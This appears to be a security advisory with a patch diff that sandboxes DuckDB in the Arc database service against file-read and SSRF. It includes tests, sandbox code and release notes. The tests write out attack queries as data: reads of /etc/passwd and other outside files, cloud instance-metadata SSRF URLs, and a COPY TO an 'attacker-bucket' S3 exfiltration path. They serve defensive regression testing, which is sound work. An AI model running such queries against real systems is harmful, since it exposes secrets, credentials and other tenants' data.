    +			fmt.Sprintf("SELECT * FROM read_json('%s', columns={'l':'VARCHAR'}) LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM read_text('%s') LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM read_blob('%s') LIMIT 1", outsidePath),
    +			"SELECT * FROM glob('/etc/*') LIMIT 1",
    +			fmt.Sprintf("SELECT * FROM parquet_metadata('%s') LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM parquet_schema('%s') LIMIT 1", outsidePath),
    +			fmt.Sprintf("SELECT * FROM read_parquet('%s') LIMIT 1", outsidePath),
    +			// read_xlsx requires the excel community extension which is
    +			// neither installed nor loaded in this test setup. The query
    +			// must still fail — either the sandbox blocks file access or
    +			// the extension lookup errors — but it must NEVER succeed.
    +			fmt.Sprintf("SELECT * FROM read_xlsx('%s') LIMIT 1", outsidePath),
    +		} {
    +			mustFail(t, q, "io family")
    +		}
    +	})
    +
    +	// `range(...)` is a pure scalar that does NOT touch the filesystem; it
    +	// should remain callable post-lockdown. Documents what the sandbox does
    +	// NOT block, so future contributors don't mistakenly add it to the
    +	// blocked list. (This is the inverse-test for the I/O family above.)
    +	t.Run("range is not gated by the sandbox", func(t *testing.T) {
    +		var n int
    +		if err := db.DB().QueryRowContext(ctx, "SELECT COUNT(*) FROM range(0, 100)").Scan(&n); err != nil {
    +			t.Fatalf("range(): %v", err)
    +		}
    +		if n != 100 {
    +			t.Errorf("range(0,100) returned %d rows, want 100", n)
    +		}
    +	})
    +
    +	t.Run("ssrf via http/https blocked", func(t *testing.T) {
    +		// Even though httpfs may or may not be loaded (Arc loads it at
    +		// startup when S3 is configured), HTTP URLs are gated by the same
    +		// allowed_directories check. The link-local instance-metadata IP
    +		// is the standard cloud SSRF target.
    +		for _, q := range []string{
    +			"SELECT * FROM read_csv_auto('http://169.254.169.254/latest/meta-data/', header=false, columns={'l':'VARCHAR'}) LIMIT 1",
    +			"SELECT * FROM read_csv_auto('https://169.254.169.254/latest/meta-data/', header=false, columns={'l':'VARCHAR'}) LIMIT 1",
    +		} {
    +			mustFail(t, q, "ssrf")
    +		}
    +	})
    +
    +	t.Run("COPY TO outside allowlist blocked", func(t *testing.T) {
    +		// COPY ... TO writes the file via the same OpenerFileSystem layer
    +		// that read_parquet uses; the sandbox catches it.
    +		_, err := db.DB().ExecContext(ctx,
    +			fmt.Sprintf("COPY (SELECT 1 AS x) TO '%s.parquet' (FORMAT PARQUET)", outsidePath),
    +		)
    +		if err == nil {
    +			t.Error("COPY TO outside allowlist succeeded — sandbox missed write path")
    +		}
    +	})
    +
    +	t.Run("COPY TO s3 attacker bucket blocked", func(t *testing.T) {
    +		// The fixture's Config does not populate S3Bucket or ColdS3Bucket,
    +		// so no s3:// entries exist in the allowlist. A COPY ... TO an
    +		// arbitrary s3:// URL must be rejected the same way a local one is.
    +		_, err := db.DB().ExecContext(ctx,
    +			"COPY (SELECT 1 AS x) TO 's3://attacker-bucket/exfil.parquet' (FORMAT PARQUET)",
    +		)
    +		if err == nil {
    +			t.Error("COPY TO s3:// outside allowlist succeeded — sandbox missed S3 exfil path")
    +		}
    +	})
    +
    +	t.Run("EXPORT DATABASE outside allowlist blocked", func(t *testing.T) {
    +		// EXPORT writes a directory of files. Even if the directory cannot
    +		// be created, the sandbox should reject the path before DuckDB
    +		// attempts to materialise it.
    +		_, err := db.DB().ExecContext(ctx, "EXPORT DATABASE '/etc/arc_sandbox_export_test'")
    +		if err == nil {
    +			t.Error("EXPORT DATABASE outside allowlist succeeded — sandbox missed export path")
    +		}
    +	})
    +
    +	t.Run("INSTALL after lockdown blocked", func(t *testing.T) {
    +		// enable_external_access=false rejects new extension installs.
    +		_, err := db.DB().ExecContext(ctx, "INSTALL postgres_scanner")
    +		if err == nil {
    +			t.Error("INSTALL succeeded after lockdown — extension surface is reachable")
    +		}
    +	})
    +
    +	t.Run("lockdown is one-way", func(t *testing.T) {
    +		// SET GLOBAL enable_external_access=true must be rejected at
    +		// runtime. DuckDB throws on the SET itself.
    +		_, err := db.DB().ExecContext(ctx, "SET GLOBAL enable_external_access = true")
    +		if err == nil {
    +			t.Error("SET enable_external_access=true succeeded — sandbox is not one-way")
    +		}
    +	})
    +
    +	t.Run("enforced on every pool connection (distinct conns)", func(t *testing.T) {
    +		// Mirror the arcx test: hold N concurrent *sql.Conn so database/sql
    +		// is forced to open N distinct DuckDB connections, and run the CVE
    +		// reproduction against each. SET GLOBAL state is database-wide on
    +		// DuckDB, so this should always pass — the test documents the
    +		// invariant so a future regression to per-connection state fails
    +		// here loudly rather than silently shipping a sandbox that only
    +		// covers conn #1.
    +		const n = 4
    +		conns := make([]*sql.Conn, 0, n)
    +		defer func() {
    +			for _, c := range conns {
    +				_ = c.Close()
    +			}
    +		}()
    +		for i := range n {
    +			c, err := db.DB().Conn(ctx)
    +			if err != nil {
    +				t.Fatalf("iter %d: acquire conn: %v", i, err)
    +			}
    +			conns = append(conns, c)
    +		}
    +		for i, c := range conns {
    +			_, err := c.QueryContext(ctx,
    +				fmt.Sprintf("SELECT * FROM read_csv_auto('%s', header=false, columns={'l':'VARCHAR'}) LIMIT 1", outsidePath),
    +			)
    +			if err == nil {
    +				t.Errorf("conn %d: read_csv_auto outside allowlist succeeded — sandbox not enforced on this connection", i)
    +			}
    +		}
    +	})
    +}
    +
    +// TestSandboxEmptyAllowlistLogsButDoesNotPanic documents the behaviour of
    +// `database.New(&Config{...minimal...})` with no LocalStorageRoot, no
    +// TempDirectory, no UploadDir, no S3/Azure — empty allowlist. The sandbox
    +// still locks down (DuckDB blocks all external access) and emits a Warn so
    +// misconfigured deployments fail fast and visibly.
    +func TestSandboxEmptyAllowlistLogsButDoesNotPanic(t *testing.T) {
    +	t.Parallel()
    +	cfg := &Config{MaxConnections: 1, MemoryLimit: "128MB"}
    +	db, err := New(cfg, zerolog.Nop())
    +	if err != nil {
    +		t.Fatalf("New with empty allowlist: %v", err)
    +	}
    +	defer db.Close()
    +	// File access against any path must fail.
    +	if _, err := db.DB().Query("SELECT * FROM read_parquet('/etc/passwd') LIMIT 1"); err == nil {
    +		t.Error("read_parquet on /etc/passwd succeeded — empty-allowlist sandbox did not lock down")
    +	}
    +}
    
  • internal/database/sandbox.go+216 0 added
    @@ -0,0 +1,216 @@
    +package database
    +
    +import (
    +	"context"
    +	"database/sql"
    +	"fmt"
    +	"path"
    +	"path/filepath"
    +	"strings"
    +	"time"
    +
    +	"github.com/rs/zerolog"
    +)
    +
    +// This file owns Arc's DuckDB sandbox: an `enable_external_access=false`
    +// lockdown scoped to a per-deployment `allowed_directories` list. Closes
    +// the I/O-function denylist bypass from the 2026-05-19 security audit
    +// (read_csv_auto, read_json, read_text, glob, etc. were callable by any
    +// authenticated token against arbitrary local files).
    +//
    +// Strategy:
    +//  1. Enumerate every directory prefix Arc legitimately needs at query time
    +//     (local storage root, DuckDB spill dir, dedicated import-upload subdir,
    +//     compaction temp dir, S3/Azure bucket+prefix for hot AND cold tiers).
    +//  2. SET GLOBAL allowed_directories = [...]
    +//  3. SET GLOBAL enable_external_access = false  (one-way, cannot be undone)
    +//  4. Verify the flip actually took effect.
    +//
    +// Every INSTALL / LOAD Arc needs MUST have completed before step 3. After
    +// step 3, DuckDB rejects further INSTALL/LOAD. Already-loaded extensions
    +// (httpfs, azure, cache_httpfs, arcx) remain fully callable because
    +// enable_external_access is checked at LOAD time, not at function-invocation
    +// time. File access checks happen at file-open time against the current
    +// allowed_directories.
    +
    +// sandboxLockdownTimeout bounds the SET GLOBAL pair plus the read-back
    +// verification at startup. Five seconds is generous to cover transient
    +// pool contention while still bounding a hung DuckDB so startup fails
    +// rather than blocking indefinitely. Applied via a single context that
    +// spans the SET / SET / SELECT sequence so the budget is shared.
    +const sandboxLockdownTimeout = 5 * time.Second
    +
    +// lockdownExternalAccess seals DuckDB's filesystem access surface so that
    +// user-supplied SQL cannot reach arbitrary local files or remote URLs.
    +// Called once at the end of configureDatabase, after every INSTALL/LOAD
    +// and every SET GLOBAL Arc needs to perform.
    +func lockdownExternalAccess(db *sql.DB, cfg *Config, logger zerolog.Logger) error {
    +	componentLogger := logger.With().Str("component", "duckdb-sandbox").Logger()
    +	dirs := buildAllowedDirectories(cfg)
    +
    +	// Empty allowlist + enable_external_access=false locks DuckDB out of
    +	// every file it might legitimately need (spill, profile output, manifest
    +	// reads). Warn loudly so misconfigured deployments fail fast and visibly
    +	// rather than silently breaking every query. The Warn enumerates every
    +	// Config field that contributes to the allowlist so operators see exactly
    +	// which knob is unset.
    +	if len(dirs) == 0 {
    +		componentLogger.Warn().Msg("sandbox allowlist is empty — every file-touching query will fail; check Config.LocalStorageRoot / TempDirectory / UploadDir / CompactionTempDirectory / S3Bucket / ColdS3Bucket / AzureContainer / ColdAzureContainer wiring")
    +	}
    +
    +	ctx, cancel := context.WithTimeout(context.Background(), sandboxLockdownTimeout)
    +	defer cancel()
    +
    +	// Compose the allowed_directories SET. DuckDB accepts a list literal.
    +	// Each entry is single-quoted; embedded single quotes are doubled by
    +	// escapeSQLString. Local paths were already forward-slashed in
    +	// buildAllowedDirectories via withTrailingSlash; S3 and Azure URIs use
    +	// forward slashes natively.
    +	quoted := make([]string, len(dirs))
    +	for i, d := range dirs {
    +		quoted[i] = "'" + escapeSQLString(d) + "'"
    +	}
    +	setDirs := "SET GLOBAL allowed_directories = [" + strings.Join(quoted, ", ") + "]"
    +	if _, err := db.ExecContext(ctx, setDirs); err != nil {
    +		return fmt.Errorf("set allowed_directories: %w", err)
    +	}
    +
    +	if _, err := db.ExecContext(ctx, "SET GLOBAL enable_external_access = false"); err != nil {
    +		return fmt.Errorf("set enable_external_access=false: %w", err)
    +	}
    +
    +	// Read-back guard: a future DuckDB release could reject the flip silently
    +	// (e.g., behind a feature flag), or a misconfiguration could leave the
    +	// setting in a state we did not expect. Verify the flag actually flipped
    +	// before declaring the sandbox active.
    +	var got bool
    +	if err := db.QueryRowContext(ctx, "SELECT current_setting('enable_external_access')::BOOLEAN").Scan(&got); err != nil {
    +		return fmt.Errorf("read back enable_external_access: %w", err)
    +	}
    +	if got {
    +		return fmt.Errorf("sandbox lockdown did not take effect: enable_external_access is still true")
    +	}
    +
    +	componentLogger.Info().Strs("allowed_directories", dirs).Msg("DuckDB external access locked down (sandbox active)")
    +	return nil
    +}
    +
    +// buildAllowedDirectories enumerates every directory prefix Arc legitimately
    +// needs DuckDB to read from or write to after lockdown. Returns trailing-
    +// slashed, forward-slash entries ready to interpolate into the
    +// `allowed_directories` SET. Order is informational only — DuckDB matches
    +// by prefix in any order.
    +//
    +// Paths are passed through verbatim by this function; the caller in main.go
    +// is responsible for absolute-resolution before populating Config. Empty
    +// cfg fields are skipped so test fixtures can construct a minimal Config
    +// without producing nonsensical allowlist entries.
    +func buildAllowedDirectories(cfg *Config) []string {
    +	dirs := make([]string, 0, 8)
    +
    +	if cfg.LocalStorageRoot != "" {
    +		dirs = append(dirs, withTrailingSlash(cfg.LocalStorageRoot))
    +	}
    +	if cfg.TempDirectory != "" {
    +		dirs = append(dirs, withTrailingSlash(cfg.TempDirectory))
    +	}
    +	// Dedicated import-upload directory (also used by the DELETE handler for
    +	// S3-rewrite staging). Narrower than os.TempDir(): only this single
    +	// directory is reachable, so other processes' /tmp files stay outside
    +	// the DuckDB sandbox. main.go creates it under TempDirectory at startup.
    +	if cfg.UploadDir != "" {
    +		dirs = append(dirs, withTrailingSlash(cfg.UploadDir))
    +	}
    +	// Compaction's own temp directory (cfg.Compaction.TempDirectory, default
    +	// ./data/compaction). Today compaction runs in a subprocess (see
    +	// internal/compaction/subprocess.go) that opens its OWN DuckDB without
    +	// going through configureDatabase, so the subprocess is not subject to
    +	// this sandbox and does not need this entry. Allowlisting it anyway is
    +	// defensive: any future parent-side code path that COPY-rewrites parquet
    +	// to this dir (e.g., a refactor moving compaction back in-process) would
    +	// otherwise fail post-lockdown with a confusing permission error.
    +	if cfg.CompactionTempDirectory != "" {
    +		dirs = append(dirs, withTrailingSlash(cfg.CompactionTempDirectory))
    +	}
    +	// Primary S3 backend (when storage.backend = "s3"). The query rewriter
    +	// emits read_parquet('s3://<bucket>/<prefix>/...') for both ingest reads
    +	// and queries.
    +	var hotS3 string
    +	if cfg.S3Bucket != "" {
    +		hotS3 = s3PrefixURI(cfg.S3Bucket, cfg.S3Prefix)
    +		dirs = append(dirs, hotS3)
    +	}
    +	// Cold-tier S3 (Enterprise tiered storage). internal/tiering/router.go
    +	// emits read_parquet('s3://<cold-bucket>/<cold-prefix>/...'). The hot=local
    +	// + cold=S3 topology is canonical, but operators ALSO run hot=S3 with
    +	// shared-bucket-different-prefix cold tiers (e.g. bucket=warehouse with
    +	// hot/ and cold/ prefixes). Dedupe on the FULL URI, not just the bucket
    +	// name — a same-bucket-different-prefix cold tier MUST get its own
    +	// allowlist entry.
    +	if cfg.ColdS3Bucket != "" {
    +		coldS3 := s3PrefixURI(cfg.ColdS3Bucket, cfg.ColdS3Prefix)
    +		if coldS3 != hotS3 {
    +			dirs = append(dirs, coldS3)
    +		}
    +	}
    +	// Primary Azure backend (when storage.backend = "azure"). Arc's config
    +	// does not currently expose a per-deployment Azure key prefix, so the
    +	// allowlist scopes to the whole container.
    +	var hotAzure string
    +	if cfg.AzureContainer != "" {
    +		hotAzure = "azure://" + cfg.AzureContainer + "/"
    +		dirs = append(dirs, hotAzure)
    +	}
    +	// Cold-tier Azure (Enterprise). Mirrors the S3 cold-tier full-URI dedupe.
    +	if cfg.ColdAzureContainer != "" {
    +		coldAzure := "azure://" + cfg.ColdAzureContainer + "/"
    +		if coldAzure != hotAzure {
    +			dirs = append(dirs, coldAzure)
    +		}
    +	}
    +	return dirs
    +}
    +
    +// withTrailingSlash normalises a non-empty directory-like path to a single
    +// trailing forward slash. ToSlash is folded in so callers don't need to
    +// remember to pre-normalize. Callers gate on the empty-string case before
    +// calling, so this helper assumes non-empty input.
    +func withTrailingSlash(p string) string {
    +	p = filepath.ToSlash(p)
    +	if strings.HasSuffix(p, "/") {
    +		return p
    +	}
    +	return p + "/"
    +}
    +
    +// s3PrefixURI builds a normalized "s3://<bucket>/<prefix>/" allowlist entry.
    +// Uses path.Clean (NOT filepath.Clean — the latter rewrites slashes on
    +// Windows) to collapse interior runs of slashes (`tenant-a//sub` →
    +// `tenant-a/sub`) AND to canonicalise `.` segments. Leading slashes are
    +// stripped via TrimLeft before Clean so `//tenant-a` becomes `tenant-a`.
    +//
    +// `..` segments are rejected outright: path.Clean preserves a leading `..`
    +// (Clean("..") → ".." and Clean("../foo") → "../foo"), so without an
    +// explicit reject the helper would emit nonsensical entries like
    +// `s3://bucket/../`. An operator that supplies `..` is misconfigured;
    +// fall back to the bare-bucket prefix and let DuckDB reject the actual
    +// read at query time with a meaningful error.
    +//
    +// Always trailing-slashed so DuckDB's prefix matcher treats the entry as
    +// a directory.
    +func s3PrefixURI(bucket, prefix string) string {
    +	prefix = strings.TrimLeft(prefix, "/")
    +	if prefix == "" {
    +		return "s3://" + bucket + "/"
    +	}
    +	prefix = path.Clean(prefix)
    +	// path.Clean leaves "." (when input was "./" or "."), and preserves any
    +	// leading ".." segments. Both shapes are operator-misconfiguration; the
    +	// safe fallback is the bare bucket. A query that legitimately needs an
    +	// out-of-prefix path will surface a clearer permission error than
    +	// shipping a nonsensical allowlist entry.
    +	if prefix == "." || prefix == ".." || strings.HasPrefix(prefix, "../") {
    +		return "s3://" + bucket + "/"
    +	}
    +	return "s3://" + bucket + "/" + prefix + "/"
    +}
    
  • RELEASE_NOTES_2026.06.1.md+33 0 modified
    @@ -2,6 +2,39 @@
     
     > **Status:** In progress. Entries are added as PRs land.
     
    +## Security fixes
    +
    +### DuckDB I/O sandbox closes arbitrary file-read by any authenticated caller
    +
    +Reported by [Alex Manson](https://neurowinter.com/) ([@NeuroWinter](https://github.com/NeuroWinter)) — thank you for the detailed report and proof-of-concept.
    +
    +An external security report against the v26.05.1 main branch found that any token holding even an empty `permissions: []` set could read arbitrary local files through DuckDB's I/O function family — `read_csv_auto`, `read_json`, `read_text`, `read_blob`, `glob`, `parquet_metadata`, `parquet_schema`, `read_xlsx`, etc. The existing user-SQL denylist blocked only `read_parquet(` and `arc_partition_agg(`, and RBAC table-level checks inspected `FROM`/`JOIN` clauses, so a scalar table function in the `SELECT` list slipped past both layers.
    +
    +Impact on a deployment with auth enabled but RBAC not subscribed: a single-line POST to `/api/v1/query` returned the contents of `auth.db` (bcrypt hashes plus legacy SHA-256 rows), `arc.toml` (S3 secrets), TLS private keys, `/proc/self/environ`, cross-tenant Parquet files, and — when `httpfs` was loaded — instance-metadata IPs over SSRF.
    +
    +26.06.1 replaces the denylist with a structural fix at the DuckDB layer: after every `INSTALL`/`LOAD` and every `SET GLOBAL` Arc itself needs has run, the startup path sets
    +
    +```sql
    +SET GLOBAL allowed_directories = ['<local_storage_root>/', '<temp_directory>/', '<upload_dir>/', '<compaction_temp>/', 's3://<hot_bucket>/<prefix>/', 's3://<cold_bucket>/<prefix>/', 'azure://<container>/', 'azure://<cold_container>/']
    +SET GLOBAL enable_external_access = false
    +```
    +
    +After this flip DuckDB refuses to open any file outside the allowlist, refuses any further `INSTALL`/`LOAD`, and rejects attempts to re-enable external access at runtime. Already-loaded extensions (httpfs, azure, cache_httpfs, arcx) remain fully callable — `enable_external_access` is checked at extension-load time, file access at file-open time. The allowlist is enforced uniformly across every pool connection (DuckDB's `ExtensionManager` and `SET GLOBAL` propagate database-wide), so a per-connection regression is not possible. The flip is read back and verified at startup so a future DuckDB release silently rejecting it would surface as a startup error rather than a silently-broken sandbox.
    +
    +A startup-time guard rejects operator-supplied paths that contain any Unicode control character (Cc — `\0`, `\n`, `\r`, `\t`, vertical tab, form feed, 0x7F), formatting character (Cf — LRM/RLM/LRE/RLE/PDF/LRO/RLO/LRI/RLI/FSI/PDI, ZWSP/ZWNJ/ZWJ, BOM, soft hyphen), or line/paragraph separator (Zl/Zp — U+2028/U+2029) before they reach the SQL literal — closing both newline injection and bidi-override log-spoofing surfaces. The upload directory used for multipart imports is created with mode `0700`, chmod'd back to `0700` if it already existed with looser permissions, and rejected at startup if a symlink has been pre-staged in its place.
    +
    +**Operator-facing change — paths must resolve to absolute**: `storage.local_path`, `database.temp_directory`, `compaction.temp_directory`, and (when arcx is enabled) the arcx storage root are now all resolved to absolute, forward-slash paths before being passed to DuckDB's allowlist. The defaults (`./data/arc`, `./.tmp`, `./data/compaction`) continue to work — they're resolved against the process working directory at startup. Operators who set these to a non-absolute path in `arc.toml` will see the resolved absolute path in the startup log line `DuckDB external access locked down (sandbox active)`.
    +
    +**Import upload directory moved**: multipart uploads landed in `os.TempDir()` (typically `/tmp` or `/var/folders/.../T/`) before 26.06.1. They now land in a dedicated `arc-uploads` subdirectory under the operator-configured temp directory — `${database.temp_directory}/arc-uploads`. Existing imports continue to work; deployments that scrape `/tmp` for monitoring no longer see Arc upload files.
    +
    +**Compaction and DELETE on S3 backends use the same allowlisted staging area** so their `COPY ... TO` writes succeed under the sandbox. No operator action required — the wiring is internal.
    +
    +**Profile-mode queries** write the JSON profiling output under `${database.temp_directory}` instead of `os.TempDir()` so `PRAGMA profiling_output` writes through an allowlisted path. Profile data was already silently empty in some DuckDB releases that route the profile writer through `OpenerFileSystem`; this fix is preemptive.
    +
    +The arcx loader was simplified: the previous per-connection `connInitFn` (which executed `LOAD '<arcx-path>'` on every new pooled connection) has been replaced with a one-shot LOAD during `configureDatabase`, plus `SET GLOBAL "arcx.storage_root" = '<path>'`. Both propagate database-wide. The per-connection LOAD was a leftover from before we'd verified DuckDB's extension model; functionally identical, simpler to reason about.
    +
    +Tests added: `TestSandbox` (CVE reproduction + full I/O family + SSRF + `COPY TO` local + `COPY TO 's3://...'` + `EXPORT DATABASE` outside allowlist + `INSTALL` after lockdown + cross-connection enforcement + `range()` remains callable + lockdown is one-way), `TestBuildAllowedDirectories` (12 table cases covering hot/cold S3 dedup, leading/interior-slash collapse, trailing-slash idempotence, empty-config behavior), `TestSandboxEmptyAllowlistLogsButDoesNotPanic`. The existing arcx tests confirm `arcx_version()` and `SET GLOBAL arcx.storage_root` propagate across 3–4 concurrent pool connections.
    +
     ## Bug fixes
     
     ### Parser no longer mis-resolves bare `time` column inside `EXTRACT(YEAR FROM time)`
    

Vulnerability mechanics

Root cause

"The user-SQL validator and RBAC inspection failed to block scalar table functions that read arbitrary files."

Attack vector

An authenticated user, even with empty permissions, can send a crafted SQL query to the `/api/v1/query` endpoint. This query leverages DuckDB's I/O functions, such as `read_csv_auto`, within the `SELECT` list to read sensitive local files or access external resources like instance metadata via SSRF. The vulnerability bypasses existing denylists and RBAC checks because these only inspect `FROM` and `JOIN` clauses, not scalar table functions in the `SELECT` list [ref_id=1].

Affected code

The vulnerability exists in `internal/api/query.go:ValidateSQLRequest`, where the SQL validation logic was insufficient. The fix is implemented in `cmd/arc/main.go` and `internal/database/duckdb.go` via the `SET GLOBAL` commands to sandbox DuckDB queries [patch_id=5277506].

What the fix does

The patch introduces a structural sandbox at the DuckDB layer by setting global configurations. `SET GLOBAL allowed_directories` is configured with Arc's legitimate filesystem prefixes, and `SET GLOBAL enable_external_access` is set to `false`. This prevents DuckDB from accessing any files outside the explicitly allowed directories and disallows further external access, effectively closing the vulnerability by enforcing a strict filesystem boundary [patch_id=5277506].

Preconditions

  • authThe attacker must be authenticated and possess a token, even one with empty permissions.

Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.